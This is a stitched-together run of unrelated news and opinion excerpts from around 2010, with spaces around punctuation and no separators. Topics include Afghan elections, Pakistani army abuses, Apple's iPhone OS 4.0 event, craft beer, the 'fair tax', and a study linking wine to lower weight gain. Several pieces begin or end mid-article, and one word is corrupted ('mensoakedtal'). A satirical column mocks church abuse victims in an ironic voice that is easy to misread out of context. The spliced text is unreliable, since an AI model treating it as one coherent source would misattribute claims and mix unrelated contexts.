In a move seen by some as a tactic to calm the row with his key allies , the Afghan government has announced that the much criticised head and deputy head of the country 's election commission has stepped down and will not oversee September 's parliamentary vote .
The retirement of Azizullah Ludin and Daoud Ali Najafi had been a key condition of the international community , which had threatened to withhold funding for the next election .
One western diplomat said the announcement had been long expected .
" The question now is who Karzai appoints to replace them and whether it is a constructive or spiteful appointment .
Will he simply pick another Ludin or will he find someone who is impartial ? "
The beginning of ethics instruction in NSW primary schools makes this a black day for right - thinking people everywhere .
Last year newmatilda.com talked about this crazy idea — crazy because there are perfectly good instructors already in place : Special Religious Education teachers .
SREs and their predecessors have been doing an outstanding job since 1880 when the Public Instruction Act was introduced , allowing young people the opportunity to learn about the glory of God for up to one hour per week .
But of course , like everything these days , people want to " modernise " with the latest whiz - bang concept , in this case teaching a 10 - week ethics course to the 50 – 80 per cent of school children that have asked not to participate in the current SRE program .
Now of course you ca n’t go around and confront each of those public school children and demand a valid reason why they do not want to take religious classes once a week — that would take too long .
So thankfully , the Church — by which I mean those people dedicated to the proper development of young people ’s values , namely Anglican Archbishop of Sydney Peter Jensen , Catholic Archbishop of Sydney George Pell and NSW Upper House MP Fred Nile — are actively instructing the Christian faithful to lobby NSW MPs .
Not ones to sit around idly , members of the Church are also protesting outside public schools to ensure the souls of the state ’s young ones may be saved , despite growing up in godless , immoral households .
To give you a better idea of how immoral these households are , under the current longstanding agreement between the state and the churches , children who do not wish to attend religious classes perform alternative tasks such as collecting rubbish in the playground .
That ’s right : some parents would prefer to see their kids foraging among garbage than learning about the sanctity and salvation of Christianity .
The Anglican Bishop of North Sydney , Glenn Davies , has " urged Anglican priests to collect information from principals of public schools to stop the spread of the secular ethics classes the Sydney Anglicans believe may threaten religious education " .
Of course , there has been private lobbying too .
Over the weekend the Sydney Morning Herald reported that Peter Jensen had effectively shut down the trial of an alternative program , due to start at 9 am today .
Jensen met with NSW Premier Kristina Keneally to reconsider this harebrained idea .
No doubt as part of those discussions he reminded her of his concerns which include this prescient statement : " That this is being offered as an alternative to children already in Christian SRE classes is well outside the definition of the trial .
It is like [ giving Christians ] a place for their child in Islamic scripture . "
If you ca n’t see the water - tight logic behind that statement then I think you need to read it again .
The ethics trial has been developed by Associate Professor Phil Cam from the UNSW who looks like a fully fledged atheist .
He has developed a curriculum with the St James Ethics Centre .
Now apart from a fancy name , there ’s little to suggest this organisation has any understanding of ethical implications .
Every day , our Christian institutions deal with questions of ethics .
Not from some ivory tower , but within large majestic buildings , often made with marble , alabaster and the finest of sandstones .
And these questions of ethics are n’t merely empty hypotheticals such as those posed by the devil ’s own lawyer Geoffrey Robertson .
The Church willingly confronts every day the ethical failings of its very own employees .
The Church does n’t make a big show of these — bragging or parading critical failures or breaches of trust .
Instead the Church sensitively deals with these issues behind closed doors , ensuring anonymity and the strictest of confidence because , as we all know , ethics are a personal choice .
Unlike outsiders , who rarely face an ethical problem of any real size , Church leaders are regularly confronted with issues so enormous they would leave most of those outside the Church speechless .
One example is the consideration of compensation to those vulnerable individuals , victims of the misguided personal behaviour of some members of the Church .
The terms of these agreements are often made to provide certainty to the parties and attempt to bring an end to difficult , and indeed stressful , periods of litigation .
When the Church offers compensation on the condition that there be no further action on — or in some cases , public mention of — these regrettable events , it magnanimously offers respite for those victims .
But the ethical question over compensation must still be answered : i.e .
How much ?
Of course the biased media will love the timing of this issue as they savage the Catholic Church over paedophile priests .
They are never interested in the good work carried out quietly by Christians .
I was relieved to see News Limited journalist Piers Akerman show some sense , using facts instead of hearsay and rumour from so - called victims .
Akerman referred to the work of US psychology professor Thomas Plante , an expert in the field of sexual abuse by Catholic priests .
His findings cast serious doubt on the scale to which priests are interfering with minors .
Plante points out that just 4 per cent of priests during the past half century ( and mostly in the 1960s and 1970s ) have had a sexual experience with a person under the age of 18 .
That ’s just one in 25 — not bad , eh ?
Furthermore , " 80 per cent of all priests who in fact abuse minors have sexually engaged with adolescent boys not prepubescent children . "
That ’s right , the majority of abusive priests are n’t paedophiles at all — they are in fact " ephebophiles " .
Also , have you noticed how many abuse claims have come from the deaf , mentally ill and orphans ?
While the media likes to seize on this as proof that the Church unethically abuses its trust to exploit the most vulnerable of people in the community , why not see it instead as proof that at least the church ’s paedophiles have enough ethical sense of civic duty to work with the disabled ?
Of course where does all of this leave the innocent young godless pupils in NSW public schools ?
The NSW Federation of Parents and Citizens ’ Associations and the St James Ethics Centre apparently invited the Anglican Archbishop Peter Jensen to meet to discuss the trial .
Hopefully the Archbishop has ignored this and is instead seeking clarity from the Bible .
It saddens me that public school P and Cs in Sydney suburbs such as Darlinghurst , Surry Hills and Leichhardt ( all renowned for championing alternative lifestyles ) would push to have this non-religious curriculum introduced .
Another danger of a course like this one is that it will erode upstanding respectability in our communities .
One scenario the course will ask children to consider is : " You have already accepted an invitation to a birthday party from a classmate when your best friend hands you an invitation to their party , to be held on the same day .
What do you do ? "
Parties ?
Friends ?
I expect Fred Nile really hit the roof when he read that .
The crusade by St James Ethics Centre to bring a secular ethics course to children who choose to receive no religious instruction also crosses a line by inviting students participating in SRE classes .
Make no mistake about it — this is a fight to stop primary school children being confronted with a syllabus without any guidance from religion .
To put it in starker terms , imagine an entire education system without the influence of Christian institutions ?
I know , it is almost too frightening to contemplate .
Giving our kids the option of thinking about ethics instead of picking up litter is a very slippery slope the NSW Department of Education has decided to throw itself down .
As if offering a choice to young people is n’t detrimental enough , before we know it , they will be offering ethics courses to girls as well .
WASHINGTON ( Reuters ) - The Pakistani army is facing fresh accusations of carrying out extra-judicial killings and torture , claims which could threaten U.S. funding for any units singled out for abuse .
New York - based Human Rights
Watch said it had briefed U.S. State Department and congressional officials about mounting evidence of more than 200 summary executions in Swat Valley in the past eight months of suspected Taliban sympathizers .
Pakistan ’s army denied the group ’s accusations of abuse in Swat , home to about 1.3 million people and the site of a much - lauded military operation last year to take back the former Taliban stronghold .
“ Swat is open to journalists and you can conduct investigative reporting there , ” Pakistani Army spokesman Major General Athar Abbas told Reuters in Islamabad .
“ Have you seen any sort of report in Pakistani newspapers ? ”
The Lahore - based Human Rights Commission of Pakistan provided a list of 249 suspected extra-judicial killings from July 30 , 2009 , to March 22 , 2010 , saying most of the bodies were found in Swat .
It said independent journalists and locals widely believed security forces were behind them .
Officials in Washington said they were taking the accusations of abuse seriously .
The Obama administration has raised the matter with Islamabad , officials said .
“ We have shared our concern about these allegations with senior Pakistani officials and will continue to monitor the situation closely , ” State Department spokesman P.J. Crowley said .
Defense Secretary Robert Gates has also discussed U.S. concerns with Pakistani military and government officials .
“ While our strong bilateral relationship with Pakistan and our close partnership in combating terrorism are very important to us , we take allegations of human rights abuses seriously , ” said Geoff Morrell , Pentagon press secretary .
White House National Security Council spokesman Mike Hammer said “ we are seeing positive forward motion from our friends ” in Pakistan on the issue , but did not elaborate .
SENSITIVE MOMENT
Accusations of rights abuses by the Pakistani military are not new , but the latest allegations come at a highly sensitive moment for U.S. - Pakistan relations .
Washington , which faces frequent criticism in Pakistan following suspected CIA drone strikes on militants , wants to strengthen ties with Islamabad .
It also wants to encourage more operations against Islamic extremists following the Pakistani military ’s success in Swat and also in South Waziristan .
But Tom Malinowski , Washington advocacy director for Human Rights Watch , said the pace of extra-judicial killings in Pakistan was “ not slowing down . ”
The United States is obliged to enforce a law authored by Senator Patrick Leahy banning assistance to foreign military units facing credible accusations of abuses , he said .
“ If they obtain or receive credible information that a particular unit is engaged in this kind of behavior , they have to de-fund the unit , ” Malinowski said .
Human Rights
Watch is not yet able to single out any units for the abuses , which also include illegal detention , he said .
Since the September 11 , 2001 , attacks on the United States , Washington has given more than $ 15 billion in aid to Pakistan , most of it for security - related work .
The Pentagon ’s Morrell said aid to Pakistan ’s military had not been cut off .
He said there had been productive dialogue with Islamabad “ about how we can help them build their capacity to deal with detainees in a rule of law framework . ”
“ This work has been going on for several months now and we are pleased to see progress being made , ” he said .
The State Department said U.S. aid was being delivered in full accordance with U.S. law , and added that assistance to Pakistani security forces incorporated human rights training .
BODIES DUMPED
Human Rights
Watch said the Army was targeting civilians who had voiced support for the Taliban when they controlled Swat or were suspected of providing them food or shelter .
“ People are taken away , and sometimes they turn up a few days or weeks later having been tortured .
Sometimes they disappear .
Sometimes their body is dumped with a bullet in the head , ” Malinowski said .
He also described cases of illegal detention .
“ A son has gone off to fight with the Taliban , and so another son is taken as a hostage , ” he said .
“ And the father is told : We will release son No. 2 when son No. 1 turns himself in . ”
He said such abuses ran against U.S. counter - insurgency strategy and could erode support for Pakistan ’s government .
The Army remains popular in Swat , which endured a brutal Taliban rule that included public beheadings and floggings .
The White House National Security Council ’s Hammer said the Obama administration had briefed Congress on the allegations .
Leahy ’s office declined to comment on the specific allegations of abuse but called for enforcement of U.S. law “ so U.S. aid does not go to army units that violate human rights . ”
“ And Pakistani authorities need to know how U.S. law is applied , ” spokesman David Carle said .
If the Boston Beer Company kicks it up to 2.5 million barrels , is it no longer a craft brewer ?
Can a macro brewer ever mimic a craft brewer closely enough to call its product a craft beer ?
Is size the only determinant of quality ?
The craft community is split .
On the one hand , since when is size a bad thing ?
" The size of a brewery has nothing to do with the quality of the beer being produced inside of it , " wrote one commenter on beeradvocate.com .
" Good beer can be produced on a large scale . "
Added another : " Not only can it be done , but I 'm sure it can be done a lot easier . "
By many reports , AC Golden is run by just a handful of brewers , largely cut off from the MillerCoors mothership .
So it 's all good , right ?
Not everyone agrees .
There 's no question about why MillerCoors wants a cut of the craft beer market — although overall beer sales were down 2.2 percent in 2009 , its worst performance in years , the craft market was up 10 percent .
But there 's a deeper question involved .
" Craft beer being produced inside a macro brewery is the equivalent to health food being produced at McDonald's , " wrote one poster .
It 's almost spiritual criticism :
Even if the beer is good now , the corporate values ( or lack thereof ) inherent in MillerCoors 's control will destroy the soul , if not the quality , of the beer .
Craft brewers themselves are likewise divided .
Over the last year I 've chatted with dozens about the craft- ification of Big Beer .
Some say it 's a matter of rising tides : if MillerCoors uses its economic power to convince Joe Sixpack to buy better beer , then some of those Joes will venture farther afield .
Others celebrate the fact that they have had enough of an impact on the market to force the big brewers to step up their game .
Craft brewers are n't stupid — the best , at least , are at least at good at selling their wares as making them .
But with 10 percent annual growth and the overhang of a " movement " identity still shaping the sector 's ethos , there 's still a naiveté about what kind of heat the likes of MillerCoors can bring .
According to AC Golden , Colorado Native Lager was in 600 stores just six weeks after its release , placed alongside Avery , Great Divide , and other Colorado microbrews .
Nothing on the label identifies it as a MillerCoors product .
As long as 10 percent growth is the rule , there might be room for corporate pretenders .
But that growth will top off at some point , and craft brewers will suddenly find themselves struggling for shelf space , even in their own niche market , with the mega - brewers .
True small - timers may have a superior product , but are they ready for this fight ?
MESA , Ariz . —
They stood a few miles from each other , but as far apart as heat and cold .
Clutching a copy of a Spanish - language article on the tough new law making it a state crime for illegal immigrants to be in Arizona and requiring those suspected of being violators to show proof of legal status , Eric Ramirez , 29 , still waited on a corner for work .
He nervously kept watch for the police and wondered what his future held .
“ We were already afraid , and I was thinking of leaving for California , ” Mr. Ramirez said as he waited on the corner in a heavily Latino enclave already drained of people by the recession and the fear of police harassment .
“ We shop in their stores , we clean their yards , but they want us out and the police will be on us . ”
In a nearby neighborhood , Ron White , 52 , said he felt a sense of relief that something was finally being done about “ the illegals ” — whom he blames for ills like congregating on the streets , breaking into homes in his neighborhood , draining tax dollars and taking jobs from Americans .
“ I sure hope it does have an effect , ” Mr. White said of the new law as he packed his car with groceries .
“ I would n’t want to show proof of citizenship , but I also do n’t feel it is racial profiling .
You are going to look different if you are an alien , and cops know . ”
Apple ’s iPhone OS unveiling on Thursday was not the kind of Apple Event where the company shows off a brand - new product , exclaims how it ’s the best product the company has ever made , and waits for the oohs and ahs of the invited guests .
Yes , iPhone OS 4.0 was the reason Apple invited the crowd to the company ’s Cupertino campus , and that new version of the operating system that runs the iPhone , iPod touch , and iPad has some promising new features .
But Thursday ’s event was a bit less about shiny - product Apple and a bit more about strategic technology company Apple .
Combating Android
Apple caught everyone in the smartphone industry flat - footed back in 2007 with the original iPhone .
But the iPhone has ignited serious competition in the industry , with Google ’s Android operating system fueling a lot of innovation .
Android market share is accelerating and Apple has taken lumps for not offering some of the features provided by Google ’s open - source operating system for smart phones .
The biggest knock on the iPhone from the Android camp has been multitasking : Android does it , and the iPhone does n’t .
There ’s a legitimate argument to be made that the average phone consumer does n’t care about a concept as technical as multitasking .
But that same average consumer cares quite a bit about the inability for the music from the iPhone ’s Pandora app to keep playing when they switch to Safari or Mail .
As much as I roll my eyes at the content of Motorola ’s “ Droid Does ” campaign for the Droid smartphone , the core message of that campaign is that the iPhone has limits and the Droid has none .
( I ’d argue that the Droid ’s industrial design and the usability of Android are limits , but hey , there ’s a reason I ’m not in the advertising business . )
So here comes iPhone OS 4.0 , with features that are targeted at blunting some of Android ’s perceived advantages , chief among them multitasking .
On Thursday Apple was able to bring the CEO of Pandora out on stage , to drop some seriously staggering data about the iPhone ’s popularity — 25 percent of all Pandora ’s listening time comes from the iPhone — and then show off a new version of the Pandora app running under iPhone OS 4 , happily playing music even while he switched to other apps .
Toss in a visit from Skype to trumpet the iPhone ’s newfound ability to run its voice - over - IP program in the background and it ’s clear that Apple has smacked down one of Android ’s advantages .
( And yes , techie types can argue about whether the seven multitasking APIs supported by iPhone OS 4.0 will truly make the iPhone ’s multitasking superior to the system used by Android .
But will regular consumers care ?
I kind of doubt it .
Pandora will work in the background on the iPhone starting this summer .
Simple , clear , and a positive message for Apple . )
App Store arbiter
Of course , one area on which Apple gets beaten up on a regular basis is the App Store .
The App Store is an asset for Apple , perhaps its strongest asset .
But many critics deride Apple ’s policies about what apps it allows in to the store .
This could all be defused , of course , if Apple were to allow what Google does with Android — namely , a system preference buried a few menus down that allows users to install third - party apps that do n’t come through Android Market , the Google equivalent of the App Store .
In the Q&A session following Thursday ’s event , Ryan Block from GDGT asked Steve Jobs about this very issue :
Why not let people who really want to add third - party apps do so ?
Most consumers would never use the feature , and it would eliminate most criticism of the App Store approval process .
Jobs ’ answer was interesting , in that he did n’t offer the possibility that things would change in the future .
He essentially said that there ’s a porn app store for Android and that Apple does n’t want that on the iPhone , so “ we do n’t want to go there . ”
Perhaps this means he does n’t think App Store gatekeeping is really a big issue .
I think it ’s more likely , though , that Apple would rather be seen as a heavy - handed arbiter of app approvals than be seen as the purveyor of a product that runs bad stuff .
If the App Store is Apple ’s biggest asset , and Apple ’s products are increasingly appreciated in the context of how they run apps , then losing control of the App Store would be tantamount to losing control of the entire iPhone OS platform .
If you have n’t noticed , Apple is not a company that is willing to lose even a tiny bit of control over its products .
( It ’s what infuriates many of the company ’s critics , but it ’s also what makes Apple and its products what they are .
You ca n’t have one without the other . )
Blocking out Adobe
Apple ’s concern about losing control over its platform reared its head in another , related area on Thursday : its revision of the iPhone Software Developer Kit guidelines to ban all applications developed using systems not approved by Apple .
This move has generally been reported as a poke in the eye of Adobe , which has announced that one feature of its CS5 suite of products will include the ability for Flash developers to compile iPhone versions of their Flash apps .
And yeah , it is that .
Apple ’s distaste for Flash is real , and as Jobs reiterated Thursday via a one - word answer to a question on the topic , Apple has “ no ” plans to let it on the iPhone .
Apple does n’t want Flash - created apps on the App Store for a simple reason :
It reduces the iPhone to a lowest - common denominator platform , and at that point Apple loses all control over the iPhone OS experience .
Once developers can create an app in one development environment — Adobe ’s — and compile it to run on every smartphone known to humankind , many developers will decide to save themselves a boatload of money and stop developing native apps for the iPhone , Android , and other platforms .
They ’ll just develop once , for Flash , and let it run anywhere .
Sounds good , but the develop - once - run - anywhere philosophy is something that makes more sense to bean counters and development - environment vendors than it does to platform owners and discriminating users .
In the ’90s we were told that Java apps would be the future of software , because you could write them once and deploy them anywhere .
As someone who used to use a Java - based Mac app on an almost daily basis , let me tell you : it was a disaster .
Java apps did n’t behave like Mac apps .
They were ugly and awful and weird , but hey , at least they ran on the Mac .
It ’s the same way I feel about Adobe ’s AIR environment today .
It ’s a Flash and / or HTML - based system that lets developers write cross-platform desktop apps .
A good example of an Adobe AIR app is TweetDeck .
A lot of people like TweetDeck for Mac , and bless ’em .
I can only assume they like it because they like its feature set .
It ’s a horrible Mac app , though .
It ’s got no menu bar to speak of , a strange and limited preferences window , weird scroll bars ... the list goes on .
It feels , in short , like a Web app that ’s been mashed into a window so that it can pretend to be a native Mac app .
And — spoiler alert — that ’s because it is .
Apple does n’t want apps that do n’t feel like native iPhone apps on the iPhone .
It does n’t want Adobe to aid developers in creating a world where App X for iPhone and App X for Android are indistinguishable from one another .
Apple does n’t want to introduce new iPhone features and then watch as nobody takes advantage of them because Adobe has n’t updated its development system yet .
Or , worse , watches as Adobe refuses to adopt them because the other operating systems do n’t support those features .
If iPhone apps are one of Apple ’s greatest assets , a lowest - common - demoninator app world is Apple ’s greatest nightmare .
Apple wants the iPhone app experience to be created using Apple ’s native tools by developers who are engaged with the platform and falling over themselves to support Apple ’s latest features .
These are the developers who were downloading and installing iPhone OS 4.0 on Thursday and poring over the documentation , getting ready to dig in and start updating their apps for this summer ’s release .
I understand the fury at Adobe over Apple ’s moves against Flash development on the iPhone .
( And I ’m sad that this particularly targeted spat may have incalculable fall - out on the rest of the Adobe - Apple relationship , which will potentially impact both companies ’ customers down the road . )
It ’s got a bit of the feeling of Lucy pulling the football away from Charlie Brown , but with one key difference : in this scenario , Lucy never asked Charlie Brown to kick that football .
Charlie Brown saw a bunch of other kids kicking the football and thought he could run up and kick it too .
Is it mean for Lucy to yank the football away from ol ’
Chuck at the last minute ?
Yeah , absolutely .
But it ’s Lucy ’s football .
Search ?
That ’s so ’00s .
Another bomb lobbed by Steve Jobs on Thursday was aimed right at Google , and not at its Android appendage , but right at its core : search and search - based text advertising .
Here ’s what Jobs said :
On the desktop , search is where it ’s at .
That ’s where the money is .
But on a mobile device , search has n’t happened .
Search is not where it ’s at .
People are n’t searching on a mobile device like they do on the desktop .
What ’s happening is , they ’re spending all their time in apps .
And this is where the opportunity to deliver advertising is .
Not as part of search , but as part of apps .
Translation : Apple thinks that Google ’s huge advantage when it comes to advertising on the Web does n’t necessarily extend to the smartphone .
Apple ’s take is that users are not searching on the Web so much as they ’re using apps to find what they want .
And so here comes iAd , Apple ’s direct competition to Google and other mobile ad networks .
It was funny sitting in Apple ’s presentation theater listening to Jobs speak enthusiastically about iAd .
( And make no mistake , this was not Jobs going through the motions — he seemed legitimately excited about the potential of iAd . )
Because , let ’s face it — it ’s hard for most consumers to get excited about new tools to bring us more commercials .
Jobs ’ excitement about iAd was coupled with some pretty serious shots at the world of Web advertising .
To the delight of pretty much everybody who is n’t in the text - ad business , he slammed a world of Web ads that lack emotion and fail to connect with users .
( Translation : Google text ads may do the job , but they are n't any fun . )
In Jobs ’ vision , good advertising is a rich experience generated by very creative people and appreciated by the audience they ’re trying to reach .
We want to change the quality of the advertising as well .
Now , we ’re all familiar with interactive ads on the Web .
They ’re interactive , but they are really not capable of delivering emotion .
Which is why the majority of ad dollars still flow through television .
Because advertisers can deliver an emotional message through television .
What we want to do with iAd is deliver interaction , but also deliver emotion .
Ad agencies are super excited , because so far digital ads have n’t been rich enough to warrant having a world - class ad agency .
For the first time , they ’re seeing how to bring their storytelling skills to digital ads .
And they ’re really excited about going and hiring a bunch of technical people to create these types of ads , and combine them with their storytelling people .
I think this could be a whole new avenue for the advertising agency people .
Because for the first time they can take advantage of all those skills .
I know , I know , people actually liking ads ?
And yet , did you like those John Hodgman and Justin Long ads for Apple ?
Do some billboards catch your eye ?
How about rich print advertising ?
I ca n’t tell you how many people write to me saying how they really enjoy the advertisements in the print edition Macworld and wish there were more of them !
The point Jobs was making was that advertising does n’t have to suck .
And , by extension , he was saying that Google ’s approach to advertising does .
Now , I ’m pretty sure that lowest - common - demoninator text ads will always be with us , but I agree with Jobs that there ’s got to be a place for something richer , too .
Especially for big companies ( with massive advertising budgets ) like the ones Apple used as examples of iAd .
Hysterical complaints about an ad - filled app apocalypse aside ( lots of apps already have ads , thank you very much — and it ’s the fault of every one of you who see a $ 3 app on the App Store and complain that it ’s way too rich for your blood ) , what Apple ’s trying to do is use the emergence of the App Store and the power of smartphone apps to rewrite the mobile advertising playbook the same way Google changed how advertising on the Web works .
Yeah , in the end it might mean we end up with more ads in apps .
But if the ads are better , and they ’re easily dismissable , maybe that ’s not the worst thing in the world .
Apple versus the world
All in all , Thursday ’s Apple event was a bit feisty .
And the company has certainly been taking its lumps for it .
I ’ve seen plenty of tongue - clucking and self - serving hysteria from people who say they are now disillusioned with Apple ’s behavior in these matters .
To that , I have two comments .
First , it ’s absolutely appropriate for people to dislike specific strategic moves Apple makes .
I do n’t necessarily agree with all of them myself , but I think I understand why Apple is making them .
( For example , I understand why Apple dumped Macworld Expo .
I do n’t necessarily agree with that decision , but I do understand why the company made it . )
In other free - form gaming developments , Farbs — the mind behind local favorite ' Game To Get ' , Captain Forever — has officially unveiled PlayPen , a community site that harnesses the scale and ease - of - use of wikis and morphs it into an open - ended lo -fi adventure game .
Which makes it sound a bit more complicated than it actually is : in essence , PlayPen is a low - res pixel - art editor that allows anyone to branch or modify individual screens , hyperlinking them in as many varied directions as you or anyone could imagine .
Is it chaos ?
It absolutely , beautifully is : even in the few short days that the public release has been open , it 's already seen some 1500 new pages added , with paths laid down to meet pathetic gnome - centaurs while on mushroom - addled freakouts , or , uh , unmediated poetry discussions with Duck Harold Bloom , which is about all you could ask for — and is yours for the modifying if it does n't live up to your darkest desires .
PlayPen [ Farbs ]
Google 's chief executive Eric Schmidt .
That 's according to an algorithm developed by executive pay expert Graef Crystal .
In a survey for Bloomberg News that analyzed the compensation of 271 chief executive officers , Crystal concluded that higher shareholder returns did not lead to higher pay or vice versa .
Not a huge surprise .
But some of the details are interesting .
For example : CBS chief executive Leslie Moonves , the highest paid CEO in the survey , would see his pay slashed by $ 28 million under Crystal 's model .
On the opposite end of the spectrum , Google 's Schmidt would deserve a $ 17 million raise over his reported $ 245,322 base salary .
" The return explained none of the variations , " said Crystal , 76 , told Bloomberg .
" Simply put , companies do n't pay for performance .
People wo n't like this : Crystal 's model also found that Wall Street CEOs were dramatically underpaid .
The chief executives of Goldman Sachs , JPMorgan , Morgan Stanley and Citigroup each earned " at least 89 percent less than the return - driven pay calculation in the Crystal model , " according to the Bloomberg article .
It 's worth pointing out that the higher shareholder returns from Wall Street 's recent gangbuster quarters are the result of a government bailout , the reemergence of a hugely profitable Wall Street trading environment and federal support for the housing market .
At the same time , Wall Street CEOs have drawn down their salaries in public relations moves while anger at the banks continues amongst 10 percent unemployment .
In short , it 's hard to compare Wall Street pay to earned performance right now .
A new addition to our Under The Hood series , meet A123 Systems , one of the major battery companies literally powering our electric future .
A123 Systems , the lithium iron phosphate battery manufacturer based in Watertown , Massachusetts , is currently contracted to supply batteries to some of the biggest names in the electric and hybrid electric vehicle world , with Fisker , GE , Think , BMW , Daimler and GM all onboard in one way or another .
A123 Systems uses nanophosphate MIT derived technology to maximise battery capacity , battery charging time and a significantly longer battery lifespan and as such has also become very popular with R/C model enthusiasts and companies like Black and Decker who are using the batteries in their cordless power tools .
A123 ’s IPO hit the flickering stock market screens in September 2009 at an initial offering of $ 13.5 per share and raised $ 380,000,000 .
Shares hit a high of $ 28.20 but have now receded to a more modest $ 14.20 ( at the time of writing ) , check AONE for exact current pricing .
It is widely anticipated that A123 Systems will be the lead supplier of lithium - ion battery systems for both the North American and European electric and hybrid vehicle makers with Asian automotive manufacturing relying on technological advances made in the lucrative cell phone and laptop markets .
- To stay in the loop join our Facebook page grab the RSS feed or join us on Twitter @ElectroVelocity -
Democrats are eyeing the “ fair tax ” as a wedge issue in the 2010 elections , hoping to force Republican candidates across the country to take a stand on the conservative proposal .
The so - called fair tax — which would replace the current income tax system with a 23 percent national sales tax — has been a campaign plank for some conservatives for years , but it has gained prominence with the rise of the Tea Party movement .
The Tea Party “ Contract from America , ” released last week , calls for a “ single - rate tax system . ”
ADVERTISEMENT
Republican leaders in Washington have voiced general support for the Tea Party platform but have shied away from endorsing its specific proposals .
For Democrats , highlighting the “ fair tax ” issue is a component of their strategy of trying to splinter the GOP from the Tea Party movement .
Democrats say the proposal would benefit the rich at the expense of working families , a line that dovetails with their broader campaign message that Republicans are backing big - money interests rather than “ Main Street . ”
“ This radical new tax hike from House Republicans and their candidates would have a devastating impact on middle - class families , ” said Ryan Rudominer , a spokesman for the Democratic Congressional Campaign Committee ( DCCC ) .
While the Tea Party platform calls for a single - rate tax , it does not specify whether the tax should be on income or sales .
The executive director of the New Patriot Journal , Shelby Blakely , said the goal was a system in which “ everybody pays the same proportional tax . ”
“ Once we get there , we can debate which one is the better idea , ” Blakely said .
House GOP leaders John Boehner John Andrew BoehnerLongtime
House parliamentarian to step down
Five things we learned from this year 's primaries Bad blood between Pelosi , Meadows complicates coronavirus talks MORE ( Ohio ) and Eric Cantor Eric Ivan Cantor The Hill 's Campaign Report : Florida hangs in the balance Eric Cantor teams up with former rival Dave Brat in supporting GOP candidate in former district Bottom line MORE ( Va. ) released statements of support for the “ Contract from America , ” although spokesmen for both noted that they were not endorsing all of the specific provisions .
The chairman of the National Republican Congressional Committee ( NRCC ) , Rep. Pete Sessions ( Texas ) , said Tuesday that the national party would unveil its own issue platform after Labor Day .
In the May 18 special election in Pennsylvania to replace the late Rep. John Murtha ( D ) , the DCCC is running a television ad attacking the Republican nominee , Tim Burns , for supporting the fair tax , using the issue to accuse him of supporting higher taxes on groceries , gas and medicine .
The ad refers to an interview Burns gave last year in which he said he “ would love to ultimately see the fair tax implemented . ”
He went on to suggest that pursuing the fair tax “ straight out of the gate ” would be impractical because it would require overhauling the entire tax code .
A Burns campaign spokesman , Kent Gates , said the DCCC ad “ is a complete distortion at best . ”
Burns issued a statement to The Hill saying he supports “ making our tax code flatter and fairer . ”
“ Any discussion like the fair tax would have to be part of a debate on creating an entirely new tax code , ” Burns said .
The DCCC has a list of seven other GOP candidates in competitive districts whom it plans to target for supporting the “ fair tax . ”
Yet the Democrats ’ strategy could be complicated by growing talk within their own ranks of a “ value - added tax , ” or VAT , a levy on goods and services that advocates see as supplementing the income tax rather than replacing it .
While there are key differences between how the “ fair tax ” and a VAT would be envisioned and administered , both would likely involve the taxes on everyday staples that Democrats are now attacking Republicans for supporting .
Discussions about a VAT have increased in recent months as Democrats grapple with the likelihood that they will need to tap additional sources of tax revenue to close the soaring budget deficit .
Former Federal Reserve Chairman Paul Volcker , who has advised President Barack Obama Barack Hussein ObamaUnseemly brawl unlikely to change a thing
It 's now up to health systems to solve our food problems Testing the Electoral College process against judicial overreach MORE , has said it should be considered , as has Sen. Kent Conrad ( D - N.D. ) , chairman of the Budget Committee .
And retiring Sen. George Voinovich ( R - Ohio ) has also said it should be an option .
Speaker Nancy Pelosi ( D - Calif. ) said last fall that the VAT should be “ on the table ” along with other tax proposals and that it ’s “ fair to look at ” a value - added tax .
“ Considering the new taxes they have proposed to pay for their government spending spree , Democrats may want to think twice before challenging their opponents to a meaningful debate on the issue , ” said Paul Lindsay , spokesman for the NRCC .
The VAT could be considered by the blue - ribbon deficit and debt commission that Obama established earlier this year .
The panel will hold its first meeting next week .
Even as the deficit committee prepares to begin its work , the Obama administration has distanced itself from the VAT talk , wary of it becoming an issue in the fall campaign .
The commission will not release its recommendations until after the November election .
“ This is not something the president has proposed , nor is it under consideration , ” White House press secretary Robert Gibb told reporters on Monday when asked about the value - added tax .
Cheers !
A glass of wine a day can help you stay slim
Forget punishing gym regimes and endless salads .
The key to keeping trim could be cracking open the Chianti .
Women who enjoy a glass or two of wine a day put on less weight than those who stick to mineral water or soft drinks , research shows - with red wine particularly forgiving .
The finding , from a long - term study of almost 20,000 women , suggests that the body processes the calories in alcohol differently to those in food .
Slimming aide :
Wine drinkers put on less weight than those who stick to water
And that puts it at odds with the general assumption among dieters that alcohol is fattening .
The conclusion could explain why French and Italian women seem to avoid piling on the pounds despite routinely drinking wine with meals .
For the latest study , 19,200 American women aged 39 and over were asked about their drinking habits .
Their weight - gain was then recorded for the next 13 years .
Perhaps not surprisingly , all of the women tended to gain weight .
However , the four in ten who said they were teetotal gained the most inches , the Archives of Internal Medicine reports .
The fewest inches were gained by those who drank ' moderate ' amounts - perhaps a glass or two of wine a day .
The research , by U.S. experts at Brigham and Women 's Hospital in Boston , also suggested not all types of alcohol were equal , with spirits and beer less kind to the waistline than wine .
One theory for the beneficial effects is that in regular drinkers the liver develops a separate method of breaking down alcohol , with surplus energy turned mainly into heat , rather than fat .
So if you take in 120 calories from a small glass of red wine , most will be burnt off .
But if they come from a slice of takeaway pizza , more will be turned into fat .
Similarly , the 570 calories in a bottle of champagne would count less than the 550 - plus in a steak and kidney pie .
Drinking red wine in moderation has often been linked with other health benefits .
One study found that people scored better at mensoakedtal arithmetic tests after being given resveratrol , the ' wonder ingredient ' in red wine .
It is thought that resveratrol , a plant chemical which has been claimed to have many qualities including extending life , widens the blood vessels , boosting blood flow to the brain .
Red wine can also stop blood clots from forming and raise levels of HDL cholesterol - ' good cholesterol ' that protects against hardening of the blood vessels .
Other research has shown that just half a glass of red wine a day can greatly cut the odds of death from heart disease and a glass or two of alcohol a day can extend life expectancy by almost four years .
But it is not all good news .
Alcohol is also believed to be the biggest factor behind surging rates of breast cancer .
It has been a while since “ 10 Terrible Bigots in Modern History ” was released and it has proven to be quite a popular list , with many commentors clamoring on about people that were missed .
So , here are ten more examples of human slime deserving mention in order to supplement the first list .
10 David Duke
David Ernest
Duke got his start in the white nationalist circuit as Grand Wizard of the Knights of the Ku Klux Klan .
During his tenure , he attempted to put a more positive spin on the Klan by reinventing them as a simple organization looking out for the rights of white Americans .
Not surprisingly , the exchange of white robes for suits and ties did n’t sit well with most Americans , white and black , who were still haunted by memories of the violence that the Klan had committed during the Civil Rights movement .
